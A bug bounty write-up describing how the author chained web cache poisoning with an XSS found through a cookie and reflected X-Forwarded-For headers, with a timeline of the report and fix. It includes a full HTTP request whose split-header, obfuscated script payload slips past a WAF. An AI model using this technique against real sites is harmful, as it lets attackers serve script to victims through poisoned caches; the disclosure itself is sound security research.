How I Made $16,500 Hacking CDN Caching Servers — Part 2
@bxmbn
A Nice Way To Hide XSS
Bounty: $2,000
While Google Dorking, i found a particular URL, but this time, was not being cached, but if i added an cacheable extension file (.js , .css) at the end of URL, it would cache the response.
Now, all i needed was to found a XSS. I found an injection point on a Cookie, but WAF would trigger when i added anything after %20
Cookie: cookiename=xss</script%20While trying to bypass the WAF, I realized that my IP was also being reflected on that same script..
guid="</script ","24.99.19.20"Since my IP was being reflected, I tried “X-Forwarded-For” Headers, this way i can close the <script> and avoid WAF, as it would trigger if it detected <[anything]>
This is why you will see 3 “X-Forwarded-For” Headers
Request:
GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2
Host: Redacted
X-Forwarded-For: xss
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`// X-Forwarded-For: >
Cookie: gdId=xss</script%20Response:
...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">
...After Poisoned an URL with an XSS, an attacker just needed to send it to the victim
redacted.com/xxx/xx/xxx.xx/x.js?t=2021111121A nice way to hide XSS :D
This was my favorite Cache Poisoning, and it was found on a Public Program
Timeline:
Reported → December 11, 2021
Triaged → December 14, 2021
Bounty Awarded → January 7, 2022
Fixed → March 7, 2022
Next:
Part 3: Cache Poisoning DoS Via X-Forwarded-Scheme Header
